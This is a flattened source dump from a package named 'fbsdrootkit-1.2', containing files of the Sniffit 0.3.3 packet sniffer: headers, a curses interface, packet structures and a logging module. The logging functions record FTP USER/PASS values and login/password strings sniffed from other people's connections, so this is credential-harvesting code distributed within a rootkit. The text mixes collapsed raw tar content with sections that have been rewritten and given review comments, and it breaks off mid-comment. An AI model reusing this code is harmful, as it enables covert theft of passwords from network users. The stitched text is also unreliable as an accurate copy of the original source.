set_signal (int, sig_hand); void sig_blocking(char, int); void stop_logging (void); int check_mask (const struct packetheader *,const unsigned char *, char *, struct unwrap *); pcap_handler interactive_packethandler( char *, const struct packetheader *, const unsigned char *); void stop_packet_info (void); void packet_info_handler (int); void create_arguments(char *, char *, char *, char *, char *, int); #endif /**** DEBUG section ********************************************************/ #ifdef DEBUG FILE *debug_dev; unsigned int debug_cnt=0; void close_debug_device (void); void debug_msg(char *); #endif fbsdrootkit-1.2/sniffit.0.3.3/sn_defines.h100600 764 764 4734 6226213211 15526 0ustar dfdf/* Sniffit Defines File -- Brecht Claerhout */ #include #include #include #include #include #include #include #include #include #include "pcap.h" /* Network Devices */ #define PPP_DEV "ppp" #ifdef LINUX #define ETH_DEV "eth" #endif #ifdef SUNOS #define ETH_DEV "le" #endif #ifdef IRIX #define ETH_DEV "et" #endif #ifdef FREEBSD #define ETH_DEV "ed" #endif #ifdef BSDI #define ETH_DEV "ef" #endif #ifdef INCLUDE_INTERFACE /* If this file is reported missing, fill in the absolute path of the file */ /* ncurses.h location can vary from time to time. 
*/ /* NOTE: this file is generaly equal to curses.h */ #include #include #include #endif /*** Normal Sniffit operations */ #define VERSION "0.3.3" /* Program Version */ #define SNAPLEN MTU /* Ethernet Packet Length */ #define MSDELAY 0 /* Delay between Packets */ #define PACKETS 1 /* Number of packets to dispatch */ #define LENGTH_OF_INTERPROC_DATA 5*SNAPLEN /* buffer capacity */ #define SCBUF 30 /* scroll buffer length */ #define LOG_PASS_BUF 20+1 /* login/pwd buffer length */ #define TELNET_ENTER 0x0d /* Enter in telnet login session */ #define FTP_ENTER 0x0d /* first char of Enter in FTP login session */ #define DEST 0 #define SOURCE 1 #define BOTH 2 #define INTERACTIVE 99 /* Packet examining defines (finish) */ /* 0-9 : TCP */ /* 10-19: ICMP */ /* 20-29: UDP */ #define DONT_EXAMINE -1 /* Skip Packet */ #define TCP_EXAMINE 0 /* TCP - 'for us' */ #define TCP_FINISH 1 /* TCP - end connection */ #define ICMP_EXAMINE 10 /* ICMP - examine */ #define UDP_EXAMINE 20 /* UDP - examine */ #define F_TCP 1 /* Flags for PROTOCOLS */ #define F_ICMP 2 #define F_UDP 4 #define F_IP 8 /*** Interface defines */ #ifdef INCLUDE_INTERFACE #define ENTER 13 #define WIN_COLOR_NORMAL 1 /* Color pairs for various functions */ #define WIN_COLOR_POINT 2 #define WIN_COLOR_DATA 3 #define WIN_COLOR_INPUT 4 #define WIN_COLOR_MENU 5 #define WIN_COLOR_PACKET_INFO 6 #define CONN_NAMELEN 56 /* length of string */ #define MENU " Masks: F1-Source IP F2-Dest. IP F3-Source Port F4-Dest. 
Port" #endif fbsdrootkit-1.2/sniffit.0.3.3/sn_global.h100600 764 764 521 6226213211 15317 0ustar dfdf/* Sniffit Global File -- Brecht Claerhout */ /* some things that are better defined before all the rest */ /* currently some option data */ char SNIFMODE, DUMPMODE, PROTOCOLS, ASC, WILDCARD, CFG_FILE, NO_CHKSUM; char LOGLEVEL; /* All option shit */ fbsdrootkit-1.2/sniffit.0.3.3/sn_interface.h100600 764 764 50166 6226213211 16071 0ustar dfdf/* Sniffit Interface File -- Brecht Claerhout */ /*** Screen Parameters ***/ int MASK_WINDOW_ROWS, MASK_WINDOW_COLS; int MAIN_WINDOW_ROWS, MAIN_WINDOW_COLS; int INFO_WINDOW_ROWS, INFO_WINDOW_COLS; int DATA_WINDOW_ROWS, DATA_WINDOW_COLS; int INFO_WINDOW_X, INFO_WINDOW_Y; int MASK_WINDOW_X, MASK_WINDOW_Y; int DATA_WINDOW_X, DATA_WINDOW_Y; /*** Sreen operations ***/ void init_screen (void) { initscr(); cbreak(); noecho(); nonl(); clear(); if(has_colors()!=-1) { COLOR_AVAIL=1; start_color(); init_pair(WIN_COLOR_NORMAL,COLOR_WHITE,COLOR_BLUE); init_pair(WIN_COLOR_POINT,COLOR_BLUE,COLOR_CYAN); init_pair(WIN_COLOR_DATA,COLOR_BLUE,COLOR_CYAN); init_pair(WIN_COLOR_INPUT,COLOR_BLUE,COLOR_CYAN); init_pair(WIN_COLOR_MENU,COLOR_BLUE,COLOR_CYAN); init_pair(WIN_COLOR_PACKET_INFO,COLOR_BLUE,COLOR_CYAN); } else { COLOR_AVAIL=0; } MAIN_WINDOW_ROWS = LINES-5; MAIN_WINDOW_COLS = COLS; MASK_WINDOW_ROWS = 4; MASK_WINDOW_COLS = COLS; MASK_WINDOW_X = 0; MASK_WINDOW_Y = LINES-5; INFO_WINDOW_ROWS = 8; INFO_WINDOW_COLS = 35; INFO_WINDOW_X = 3; INFO_WINDOW_Y = MAIN_WINDOW_ROWS-INFO_WINDOW_ROWS-2; DATA_WINDOW_ROWS = (MAIN_WINDOW_ROWS/3)*2; DATA_WINDOW_COLS = (MAIN_WINDOW_COLS/3)*2; DATA_WINDOW_X = COLS-DATA_WINDOW_COLS-2; DATA_WINDOW_Y = 3; exit_func(screen_exit); if( (COLS<80)||(LINES<18) ) exit(0); }; void f_box_window (struct box_window *Win, int num_lines, int num_cols, int begy,int begx, int col_mode) /* col_mode : color selection */ { int i; Win->main_window=newwin(num_lines,num_cols,begy,begx); 
Win->work_window=subwin(Win->main_window,num_lines-2,num_cols-2,begy+1,begx+1); if(COLOR_AVAIL) { switch(col_mode) { case 0: wattrset(Win->main_window,COLOR_PAIR(WIN_COLOR_NORMAL)); wattrset(Win->work_window,COLOR_PAIR(WIN_COLOR_NORMAL)); break; case 1: wattrset(Win->main_window,COLOR_PAIR(WIN_COLOR_PACKET_INFO)); wattrset(Win->work_window,COLOR_PAIR(WIN_COLOR_PACKET_INFO)); break; default:break; } for(i=0;i<=(num_lines-2);i++) { wmove(Win->work_window,i,0); whline(Win->work_window,' ',num_cols-2); } } keypad(Win->work_window,1); box(Win->main_window,ACS_VLINE,ACS_HLINE); mvwprintw(Win->main_window,0,3,"Sniffit %s",VERSION); wmove(Win->work_window,0,0); wnoutrefresh(Win->main_window);wnoutrefresh(Win->work_window); doupdate(); } void data_window (struct box_window *Win, struct box_window *P_Win, int num_lines, int num_cols, int begy,int begx, char *buffer, int listitem) { int i=0, j=0; struct shared_conn_data *conn; conn = (struct shared_conn_data *) buffer; while((j=CONNECTION_CAPACITY+1) return; j=0; Win->main_window=newwin(num_lines,num_cols,begy,begx); Win->work_window=subwin(Win->main_window,num_lines-5,num_cols-2,begy+1,begx+1); scrollok(Win->work_window,1); if(COLOR_AVAIL) wattrset(Win->main_window,COLOR_PAIR(WIN_COLOR_DATA)); box(Win->main_window,ACS_VLINE,ACS_HLINE); wmove(Win->main_window,num_lines-3,1); whline(Win->main_window,ACS_HLINE,num_cols-2); wmove(Win->main_window,num_lines-2,1); whline(Win->main_window,' ',num_cols-2); wmove(Win->main_window,num_lines-2,2); waddstr(Win->main_window, conn[i].connection); strcpy(log_conn->log_enter,conn[i].connection); wmove(Win->work_window,0,0); wnoutrefresh(Win->main_window);wnoutrefresh(Win->work_window); doupdate(); } void data_device (char *buffer, int listitem) { int i=0, j=0; struct shared_conn_data *conn; conn = (struct shared_conn_data *) buffer; while((j=CONNECTION_CAPACITY+1) return; strcpy(log_conn->log_enter, conn[i].connection); } void mask_status (struct box_window *Work_win) { unsigned char *ad; 
int i; wmove(Work_win->work_window,0,1); for(i=0;i<2;i++) {wmove(Work_win->work_window,i,0); whline(Work_win->work_window,' ',COLS-2);} wmove(Work_win->work_window,0,1); wprintw(Work_win->work_window,"Source IP : "); ad=&(mask->source_ip); if(mask->source_ip==0) wprintw(Work_win->work_window,"All"); else wprintw(Work_win->work_window,"%u.%u.%u.%u",ad[0],ad[1],ad[2],ad[3]); wmove(Work_win->work_window,1,1); wprintw(Work_win->work_window,"Destination IP: "); ad=&(mask->destination_ip); if(mask->destination_ip==0) wprintw(Work_win->work_window,"All"); else wprintw(Work_win->work_window,"%u.%u.%u.%u",ad[0],ad[1],ad[2],ad[3]); wmove(Work_win->work_window,0,35); wprintw(Work_win->work_window,"Source PORT : "); if(mask->source_port==0) wprintw(Work_win->work_window,"All"); else wprintw(Work_win->work_window,"%u",mask->source_port); wmove(Work_win->work_window,1,35); wprintw(Work_win->work_window,"Destination PORT: "); if(mask->destination_port==0) wprintw(Work_win->work_window,"All"); else wprintw(Work_win->work_window,"%u",mask->destination_port); wnoutrefresh(Work_win->main_window); wnoutrefresh(Work_win->work_window); doupdate(); } void fill_box_window (struct box_window *Work_win, char *buffer, int begin_item, int boxlen, int rowlen) /* 0 is the first item */ { int i=0, j=0, line=0; struct shared_conn_data *conn; conn = (struct shared_conn_data *) buffer; while((j=CONNECTION_CAPACITY+1) return; j=0; while((linework_window,line,0); whline(Work_win->work_window,' ',rowlen); if(strcmp(log_conn->log_enter,conn[i+j].connection) != 0) wprintw(Work_win->work_window," %s",conn[i+j].connection); else wprintw(Work_win->work_window," %s *LOGGED*", conn[i+j].connection); line++; } j++; } for(i=line;iwork_window,i,0); whline(Work_win->work_window,' ',rowlen); }; wnoutrefresh(Work_win->work_window); } void point_item (struct box_window *Work_win, char *buffer, int item, int begin_item, int boxlen, int rowlen) { int i=0, j=0; struct shared_conn_data *conn; if(item<0) return; /* 
POINTpos 0 = first item -1 = no items */ /* LISTlength 0 = 1 -1 = no items */ /* DANGER - there should always be >= */ /* connections than 'item' */ conn = (struct shared_conn_data *) buffer; while((j=CONNECTION_CAPACITY+1) return; j=0; #ifdef DEBUG debug_msg(conn[i].connection); #endif if(COLOR_AVAIL!=0) wattrset(Work_win->work_window,COLOR_PAIR(WIN_COLOR_POINT)); else wattron(Work_win->work_window,A_REVERSE); wmove(Work_win->work_window,item-begin_item,0); whline(Work_win->work_window,' ',rowlen); if(strcmp(log_conn->log_enter,conn[i].connection)!=0) mvwprintw(Work_win->work_window,item-begin_item,0, " %s", conn[i].connection ); else mvwprintw(Work_win->work_window,item-begin_item,0, " %s *LOGGED*", conn[i].connection ); wnoutrefresh(Work_win->work_window); if(COLOR_AVAIL!=0) wattrset(Work_win->work_window,COLOR_PAIR(WIN_COLOR_NORMAL)); else wattroff(Work_win->work_window,A_REVERSE); } void forced_refresh (void) { #ifdef DEBUG char debug_line[200]; #endif if((POINTpos<0)&&(*LISTlength>=0)) POINTpos=0; if((POINTpos>*LISTlength)&&(*LISTlength>=0)) POINTpos=*LISTlength; if((POINTpos>*LISTlength)&&(*LISTlength<0)) POINTpos=-1; while(screen_busy!=0) {}; /* wait till screen operations stop */ #ifdef DEBUG sprintf(debug_line,"FIX: POINTpos: %d LISTlength: %d LISTpos: %d\n",POINTpos,*LISTlength,LISTpos); debug_msg(debug_line); #endif fill_box_window(&main_box, running_connections,LISTpos, MAIN_WINDOW_ROWS-2,MAIN_WINDOW_COLS-2); point_item(&main_box, running_connections, POINTpos,LISTpos, MAIN_WINDOW_ROWS-2,MAIN_WINDOW_COLS-2); if((LOGGING==1)&&(logging_device==NULL)) { touchwin(data_box.main_window);touchwin(data_box.work_window); wnoutrefresh(data_box.main_window);wnoutrefresh(data_box.work_window); } if(PACKET_INFO==1) { touchwin(packets_box.main_window);touchwin(packets_box.work_window); wnoutrefresh(packets_box.main_window); wnoutrefresh(packets_box.work_window); } doupdate(); } void menu_line (void) { int i; if(menu_window==NULL) menu_window=newwin 
(1,COLS,LINES-1,0); if(COLOR_AVAIL!=0) { wattrset(menu_window,COLOR_PAIR(WIN_COLOR_MENU)); wmove(menu_window,0,0); whline(menu_window,' ',COLS); } mvwaddstr(menu_window,0,0,MENU); wnoutrefresh(menu_window); } char *input_field(char *string, char *input) { int i; WINDOW *Work_txt, *Work_inp; #ifdef DEBUG debug_msg("IntAct: Input Field activated"); #endif Work_txt=newwin(1,COLS,LINES-1,0); Work_inp=newwin(1,50,LINES-1,strlen(string)); if(COLOR_AVAIL!=0) { wattrset(Work_inp,COLOR_PAIR(WIN_COLOR_INPUT)); wattrset(Work_txt,COLOR_PAIR(WIN_COLOR_NORMAL)); whline(Work_txt,' ',COLS); whline(Work_inp,' ',50); } mvwaddstr(Work_txt,0,0,string); while(screen_busy!=0) {}; wnoutrefresh(Work_txt);wnoutrefresh(Work_inp); doupdate(); echo();mvwgetstr(Work_inp,0,0,input);noecho(); delwin(Work_inp);delwin(Work_txt); menu_line(); forced_refresh(); return input; } void exec_mask (void) { LISTpos=0; POINTpos=-1; /* otherwise we get never ending loop */ clear_shared_mem(1); mask_status(&mask_box); if(LOGGING==1) stop_logging(); forced_refresh(); } /* signaling */ void sig_blocking(char on_off, int sig) { sigset_t set; sigemptyset(&set);sigaddset(&set,sig); if(on_off==1) {sigprocmask(SIG_BLOCK,&set,NULL);} else {sigprocmask(SIG_UNBLOCK,&set,NULL);} } void set_signal (int signum, sig_hand new_action) { struct sigaction new_sigusr; sigset_t sig_mask; sigemptyset(&sig_mask); sigaddset(&sig_mask,SIGUSR1); sigaddset(&sig_mask,SIGALRM); new_sigusr.sa_handler=new_action; new_sigusr.sa_mask=sig_mask; new_sigusr.sa_flags=0; sigaction(signum,&new_sigusr,NULL); } void interaction (int sig) /* invoked when data arrives */ { int i; struct shared_conn_data *conn; /* timeout increase */ conn = (struct shared_conn_data *) running_connections; for(i=0;ilog_enter[0]==0)) stop_logging(); screen_busy=1; if((LOGGING==1)&&(*DATAlength!=0)) { if(logging_device==NULL) { for(i=0;i<*DATAlength;i++) waddch(data_box.work_window, isprint(*(connection_data+i))? 
*(connection_data+i):'.'); } else { for(i=0;i<*DATAlength;i++) fputc(*(connection_data+i),log_dev_stream); fflush(log_dev_stream); } *DATAlength=0; } screen_busy=0; forced_refresh(); set_signal(SIGUSR1,interaction); } void packet_info_handler (int signum) { #ifdef DEBUG debug_msg("ALARM RANG"); #endif screen_busy=1; mvwprintw(packets_box.work_window,0,1,"IP packets/sec. : % 12u",(*IP_nr_of_packets)/INFO_TIMER); mvwprintw(packets_box.work_window,1,1,"TCP packets/sec. : % 12u",(*TCP_nr_of_packets)/INFO_TIMER); mvwprintw(packets_box.work_window,2,1,"ICMP packets/sec.: % 12u",(*ICMP_nr_of_packets)/INFO_TIMER); mvwprintw(packets_box.work_window,3,1,"UDP packets/sec. : % 12u",(*UDP_nr_of_packets)/INFO_TIMER); mvwprintw(packets_box.work_window,4,1,"bytes/sec. (TCP) : % 12ld",(*TCP_bytes_in_packets)/INFO_TIMER); mvwprintw(packets_box.work_window,5,1,"bytes/sec. (UDP) : % 12ld",(*UDP_bytes_in_packets)/INFO_TIMER); screen_busy=0; forced_refresh(); /* reinstall handler, reset alarm */ *IP_nr_of_packets=0; *TCP_nr_of_packets=*TCP_bytes_in_packets=0; *ICMP_nr_of_packets=0; *UDP_nr_of_packets=*UDP_bytes_in_packets=0; set_signal(SIGALRM, packet_info_handler); alarm(INFO_TIMER); } /* at/on_exit's */ void child_exit (void) { kill(Pid,SIGKILL); }; void screen_exit (void) { clear(); endwin(); }; void mem_exit (void) { if(shmctl(memory_id,IPC_RMID,0)<0) {perror("Sniffer Hartattack (you are fucked!) 
");exit(0);}; } /* Some other stuff */ void stop_logging (void) { LOGGING=0; log_conn->log_enter[0]=0; if(logging_device==NULL) {delwin(data_box.work_window); delwin(data_box.main_window);} forced_refresh(); } void stop_packet_info (void) { PACKET_INFO=0; alarm(0); delwin(packets_box.work_window), delwin(packets_box.main_window); forced_refresh(); } int add_itemlist(char *buffer, char *string) { int i, to_help, to_item; struct shared_conn_data *conn; /*invoked every time a packet comes in */ conn = (struct shared_conn_data *) buffer; for(i=0;ito_help) if(strcmp(conn[i].connection,log_conn->log_enter)!=0) { to_help=conn[i].timeout; to_item=i; } strcpy(conn[to_item].connection, string); conn[to_item].timeout=0; return to_item; } int del_itemlist(char *buffer, char *string) { int i; struct shared_conn_data *conn; conn = (struct shared_conn_data *) buffer; for(i=0;ilog_enter, string)==0) {log_conn->log_enter[0]=0;} return i; } return -1; } void clear_shared_mem(char mode) /* mode = 0 all */ /* mode = 1 keep mask */ /* keep packet count */ { int i; struct shared_conn_data *conn; *timing=1; *DATAlength=0; *LISTlength=-1; if(mode==0) { mask->source_ip=mask->destination_ip=mask->source_port=mask->destination_port=0; *IP_nr_of_packets=0; *TCP_nr_of_packets=*TCP_bytes_in_packets=0; *ICMP_nr_of_packets=0; *UDP_nr_of_packets=*UDP_bytes_in_packets=0; } log_conn->log_enter[0]=0; conn = (struct shared_conn_data *) running_connections; for(i=0;i=CONNECTION_CAPACITY+1) return; j=0; strcpy(e_dummy,conn[i].connection); strtok(e_dummy," "); strcpy(esource,strtok(NULL," ")); strcpy(es_port,strtok(NULL," ")); strtok(NULL," "); strcpy(edest,strtok(NULL," ")); strcpy(ed_port,strtok(NULL," ")); } /*** Main interface program */ void run_interface(void) { int i,key_hit; char dummy[50]; char exec_s[20],exec_sp[20],exec_d[20],exec_dp[20]; POINTpos=-1; *LISTlength=-1; LISTpos=0; LOGGING=0; PACKET_INFO=0; screen_busy=0; set_signal (SIGCHLD, SIG_IGN); set_signal(SIGUSR1,interaction); 
init_screen(); /* The whole screen setup */ f_box_window(&mask_box,MASK_WINDOW_ROWS,MASK_WINDOW_COLS,MASK_WINDOW_Y,MASK_WINDOW_X,0); mask_status(&mask_box); f_box_window(&main_box,MAIN_WINDOW_ROWS,MAIN_WINDOW_COLS,0,0,0); fill_box_window(&main_box, running_connections,LISTpos, MAIN_WINDOW_ROWS-2,MAIN_WINDOW_COLS-2); point_item(&main_box, running_connections,POINTpos,LISTpos, MAIN_WINDOW_ROWS-2,MAIN_WINDOW_COLS-2); menu_window=NULL; menu_line(); doupdate(); /* And..... draw it! */ while(1) { key_hit=wgetch(main_box.work_window); #ifdef DEBUG debug_msg("IntAct: Key Hit Received"); #endif sig_blocking(1, SIGALRM); sig_blocking(1, SIGUSR1); switch(key_hit) { case KEY_DOWN: case 'J': case 'j': if(POINTpos>=*LISTlength) break; if( POINTpos<(LISTpos+(MAIN_WINDOW_ROWS-3)) ) POINTpos++; else {if(LISTpos>=*LISTlength) break; LISTpos++; POINTpos++;}; forced_refresh(); break; case KEY_UP: case 'K': case 'k': if(POINTpos==0) break; if(POINTpos>LISTpos) POINTpos--; else {if(LISTpos==0) break; LISTpos--; POINTpos--;}; forced_refresh(); break; case ENTER: if(*LISTlength<0) break; if(LOGGING==0) { if(logging_device==NULL) data_window(&data_box,&main_box,DATA_WINDOW_ROWS, DATA_WINDOW_COLS,DATA_WINDOW_Y, DATA_WINDOW_X, running_connections,POINTpos); else data_device(running_connections,POINTpos); LOGGING=1; } else { stop_logging(); if(logging_device==NULL) data_window(&data_box,&main_box,DATA_WINDOW_ROWS, DATA_WINDOW_COLS,DATA_WINDOW_Y, DATA_WINDOW_X, running_connections,POINTpos); else data_device(running_connections,POINTpos); LOGGING=1; }; break; case 'N': case 'n': if(PACKET_INFO==0) { f_box_window(&packets_box,INFO_WINDOW_ROWS,INFO_WINDOW_COLS, INFO_WINDOW_Y, INFO_WINDOW_X ,1); PACKET_INFO=1; *IP_nr_of_packets=0; *TCP_nr_of_packets=*TCP_bytes_in_packets=0; *ICMP_nr_of_packets=0; *UDP_nr_of_packets=*UDP_bytes_in_packets=0; packet_info_handler(SIGALRM); } else {stop_packet_info();} break; case 'q': case 'Q': case KEY_F(10): if(LOGGING==1) {stop_logging();} else 
{kill(Pid,SIGKILL);exit(0);} break; case '1': case KEY_F(1): input_field("Source Ip: ",dummy); mask->source_ip=getaddrbyname(dummy); exec_mask(); break; case '2': case KEY_F(2): input_field("Destination Ip: ",dummy); mask->destination_ip=getaddrbyname(dummy); exec_mask(); break; case '3': case KEY_F(3): input_field("Source Port: ",dummy); mask->source_port=atoi(dummy); exec_mask(); break; case '4': case KEY_F(4): input_field("Destination Port: ",dummy); mask->destination_port=atoi(dummy); exec_mask(); break; case '5': case KEY_F(5): if(*LISTlength<0) break; create_arguments(exec_s,exec_sp,exec_d, exec_dp,running_connections,POINTpos); if(fork()==0) /* CHILD */ { close(0); close(1); close(2); execl("./sniffit_key5","sniffit_key5",exec_s,exec_sp,exec_d,exec_dp,NULL); exit(0); }; break; case '6': case KEY_F(6): if(*LISTlength<0) break; create_arguments(exec_s,exec_sp,exec_d, exec_dp,running_connections,POINTpos); if(fork()==0) /* CHILD */ { close(0); close(1); close(2); execl("./sniffit_key6","sniffit_key6",exec_s,exec_sp,exec_d,exec_dp,NULL); exit(0); }; break; case '7': case KEY_F(7): if(*LISTlength<0) break; create_arguments(exec_s,exec_sp,exec_d, exec_dp,running_connections,POINTpos); if(fork()==0) /* CHILD */ { close(0); close(1); close(2); execl("./sniffit_key7","sniffit_key7",exec_s,exec_sp,exec_d,exec_dp,NULL); exit(0); }; break; case '8': case KEY_F(8): if(*LISTlength<0) break; create_arguments(exec_s,exec_sp,exec_d, exec_dp,running_connections,POINTpos); if(fork()==0) /* CHILD */ { close(0); close(1); close(2); execl("./sniffit_key8","sniffit_key8",exec_s,exec_sp,exec_d,exec_dp,NULL); exit(0); }; break; case 'r': case 'R': /* mask does an auto reset */ exec_mask(); break; default: break; } sig_blocking(0, SIGALRM); sig_blocking(0, SIGUSR1); } }; fbsdrootkit-1.2/sniffit.0.3.3/sn_logfile.h100600 764 764 2651 6226213211 15526 0ustar dfdf/* Sniffit Logfile include file - Brecht Claerhout */ void logfile_exit (void) /* at/on_exit closing of logfile */ { 
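printf("Sniffit Logging session ended.\n"); print_logline("Sniffit session ended."); fflush(LogFILE); fclose(LogFILE); }

/*
 * gettime: current time as text, used as the prefix of every log record.
 *
 * Returns the buffer produced by ctime() with its trailing newline removed.
 * The caller must not free it, and the next ctime() call overwrites it.
 * A constant placeholder is returned if ctime() fails.
 */
char *gettime (void)
{
  time_t t;
  char *tm;

  time(&t);
  tm=ctime(&t);
  if(tm==NULL)                        /* never index a failed conversion */
    return "unknown time";
  tm[strcspn(tm,"\n")]=0;             /* cut at the newline wherever it falls */
  return tm;
}

/*
 * print_logline: append one "[timestamp] - text" record to LogFILE and
 * flush it immediately.
 *
 * NOTE(review): logline is written as-is. The callers below build it from
 * strings handed in by their own callers, so embedded newlines or control
 * characters would reach the log unescaped -- confirm whether they are
 * sanitised upstream.
 */
void print_logline (char *logline)
{
  fprintf(LogFILE,"[%s] - %s\n",gettime(),logline);
  fflush(LogFILE);
}

/*
 * The five helpers below format "<conn>: <label> [<value>]" into a local
 * buffer and pass it to print_logline(). They use snprintf() with the
 * buffer size so that an over-long conn or value is truncated instead of
 * overrunning the 250-byte stack buffer.
 */

/* print_ftp_user: log the USER value seen on connection `conn`. */
void print_ftp_user (char *conn, char *user)
{
  char line[250];

  snprintf(line,sizeof(line),"%s: USER [%s]",conn,user);
  print_logline (line);
}

/* print_ftp_pass: log the PASS value seen on connection `conn`. */
void print_ftp_pass(char *conn, char *pass)
{
  char line[250];

  snprintf(line,sizeof(line),"%s: PASS [%s]",conn,pass);
  print_logline (line);
}

/* print_login: log the login string seen on connection `conn`. */
void print_login (char *conn, char *login)
{
  char line[250];

  snprintf(line,sizeof(line),"%s: login [%s]",conn,login);
  print_logline (line);
}

/* print_pwd: log the password string seen on connection `conn`. */
void print_pwd (char *conn, char *pwd)
{
  char line[250];

  snprintf(line,sizeof(line),"%s: password [%s]",conn,pwd);
  print_logline (line);
}

/* print_conn: log a free-form message about connection `conn`. */
void print_conn (char *conn, char *msg)
{
  char line[250];

  snprintf(line,sizeof(line),"%s: %s",conn,msg);
  print_logline (line);
}

/*
 * open_logfile: open the session log for appending and register the
 * exit-time cleanup handler.
 *
 * Falls back to "sniffit.log" when no name is set, exits with status 1 if
 * the file cannot be opened, then restricts the file to owner read/write
 * and writes the "session started" record.
 */
void open_logfile (void)
{
  if(Logfile[0]==0)
    strcpy(Logfile,"sniffit.log");
  LogFILE=fopen(Logfile,"a");
  if(LogFILE==NULL)
    {
    printf("Sniffit hardattack.. couldn't create/open logfile...\n");
    exit(1);
    }
  exit_func(logfile_exit);      /* presumably an atexit()/on_exit() wrapper -- defined elsewhere */
  /* fchmod() takes a file descriptor, not a FILE *. Passing the stream
     pointer meant the owner-only mode would not reliably be applied. */
  if(fchmod(fileno(LogFILE), S_IWUSR|S_IRUSR)<0)
    perror("fchmod");
  /* NOTE(review): fopen() creates the file with umask-derived permissions
     and the mode is only tightened afterwards. A pre-existing file or link
     at this path is opened as it is -- worth confirming that is acceptable. */
  print_logline("Sniffit session started.");
  printf("Sniffit Logging started. (loglevel: %d)\n",LOGLEVEL);
}

fbsdrootkit-1.2/sniffit.0.3.3/sn_oldether.h100600 764 764 415 6226213211 15667 0ustar dfdf/* Sniffit old Ethernet File -- Brecht Claerhout */ struct packetheader { struct timeval ts; /* time stamp */ u_long caplen; /* length of portion present */ u_long len; /* length this packet (off wire) */ }; fbsdrootkit-1.2/sniffit.0.3.3/sn_packets.h100600 764 764 13163 6226213211 15557 0ustar dfdf/* Sniffit Packet Discription File -- Brecht Claerhout */ int PROTO_HEAD; /* Base Protocol head length (ethernet, PPP ,....)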
*/ #define ETHERHEAD 14 /* Length Ethernet Packet header */ #define PPPHEAD 4 /* Length PPP Packet header */ #define SLIPHEAD 16 /* Length SLIP Packet header */ #define URG 32 /*TCP-flags */ #define ACK 16 #define PSH 8 #define RST 4 #define SYN 2 #define FIN 1 #define NO_IP 0 #define ICMP 1 /* Protocol Numbers */ #define TCP 6 #define UDP 17 #define ICMP_HEADLENGTH 4 /* fixed ICMP header length */ #define UDP_HEADLENGTH 8 /* fixed UDP header length */ #define IP_DELAY 32 #define IP_THROUGHPUT 16 #define IP_RELIABILITY 8 #define IP_DF 2 #define IP_MF 1 char *IP_TYPE_precedence[8]= {"Routine", "Priority", "Immediate", "Flash", "Flash override", "Critical", "Internetwork control", "Network control"}; char *IP_PROTOCOL_number[34]= {"Reserved","ICMP","IGMP","GGP","Unassigned","ST","TCP","UCL","EGP","IGP", "BBN-MON","NVP-II","PUP","ARGUS","EMCOM","XNET","CHAOS","UDP","MUX", "DCN-MEAS","HMP","PRM","XNS-IDP","TRUNK-1","TRUNK-2","LEAF-1","LEAF-2", "RDP","IRTP","ISO-TP4","NETBLT","MFE-NSP","MERIT-INP","SEP"}; #define ICMP_TYPE_0 "Echo reply" #define ICMP_TYPE_3 "Destination unreachable" #define ICMP_TYPE_4 "Source quench" #define ICMP_TYPE_5 "Redirect" #define ICMP_TYPE_8 "Echo" #define ICMP_TYPE_11 "Time exceeded" #define ICMP_TYPE_12 "Parameter problem" #define ICMP_TYPE_13 "Timestamp" #define ICMP_TYPE_14 "Timestamp reply" #define ICMP_TYPE_15 "Information request" #define ICMP_TYPE_16 "Information reply" #define ICMP_TYPE_17 "Address mask request" #define ICMP_TYPE_18 "Adress mask reply" char *ICMP_type_3_code[6]= {"Net unreachable", "Host unreachable", "Protocol unreachable", "Port unreachable", "Fragmentation needed and DF set", "Source route failed"}; char *ICMP_type_5_code[4]= {"Redirect datagrams for the network", "Redirect datagrams for the host", "Redirect datagrams for the \'type of service\' and the network", "Redirect datagrams for the \'type of service\' and the host"}; char *ICMP_type_11_code[2]= {"Time-to-live exceeded in transmit", "Fragment reassembly 
time exceeded"};

/*
 * IP header as copied out of the capture buffer (options excluded).
 * NOTE(review): source/destination are `unsigned long int`. Where long is
 * wider than 32 bits this struct is larger than the on-wire header, and the
 * memcpy() in unwrap_packet() would then read past the header -- confirm
 * the target ABI.
 */
struct IP_header                     /* The IPheader (without options) */
{
  unsigned char verlen, type;        /* low nibble of verlen is used as the header length in 32-bit words */
  unsigned short length, ID, flag_offset;   /* length is read with ntohs() as the total packet length */
  unsigned char TTL, protocol;       /* protocol is compared with TCP / ICMP / UDP */
  unsigned short checksum;           /* compared with the value recomputed by in_cksum() */
  unsigned long int source, destination;
};

/* TCP header (options excluded); same `unsigned long` width caveat as above. */
struct TCP_header                    /* The TCP header (without options) */
{
  unsigned short source, destination;
  unsigned long int seq_nr, ACK_nr;
  unsigned short offset_flag, window, checksum, urgent;  /* top 4 bits of offset_flag give the header length */
};

struct ICMP_header                   /* The ICMP header */
{
  unsigned char type, code;
  unsigned short checksum;
};

struct UDP_header                    /* The UDP header */
{
  unsigned short source, destination;
  unsigned short length, checksum;
};

/*
 * Result record filled in by unwrap_packet(): the header lengths it derived
 * and the remaining payload length. All values are in bytes and come from
 * fields of the packet itself.
 */
struct unwrap                        /* some extra info */
{
  int IP_len, TCP_len, ICMP_len, UDP_len;   /* header lengths */
  int DATA_len;                             /* total length minus the header lengths */
};

/* This routine stolen from ping.c */
/*
 * in_cksum: 16-bit one's-complement checksum over `len` bytes at `addr`.
 *
 * Adds the buffer as 16-bit words, adds a trailing odd byte as the first
 * byte of a zeroed 16-bit word, folds the carries back into the low 16 bits
 * and returns the complement of the result.
 *
 * NOTE(review): the words are read through an unsigned short pointer, so
 * addr is assumed to be suitably aligned. `sum` is a plain int, which
 * presumably limits this to short buffers such as headers -- confirm at the
 * call sites.
 */
unsigned short in_cksum(unsigned short *addr,int len)
{
  /* Original author's remark: leave the `register` qualifiers alone; his
     opinion was that they are needed to make this work on both BIG and
     LITTLE endian machines. */
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  while (nleft > 1)                  /* add whole 16-bit words */
    {
    sum += *w++;
    nleft -= 2;
    }
  if (nleft == 1)                    /* odd trailing byte */
    {
    *(u_char *)(&answer) = *(u_char *)w ;
    sum += answer;
    }
  sum = (sum >> 16) + (sum & 0xffff);   /* fold the high half into the low half */
  sum += (sum >> 16);                   /* add the carry from that fold */
  answer = ~sum;
  return(answer);
}

/*
 * unwrap_packet: classify a captured frame and record its header lengths.
 *
 * sp        - start of the captured frame; the IP header is expected
 *             PROTO_HEAD bytes in.
 * unwrapped - receives IP_len, the per-protocol header length and DATA_len.
 *
 * Returns TCP, ICMP or UDP for those protocols, NO_IP when the IP header
 * checksum does not match (only checked when NO_CHKSUM is 0), and -1 for
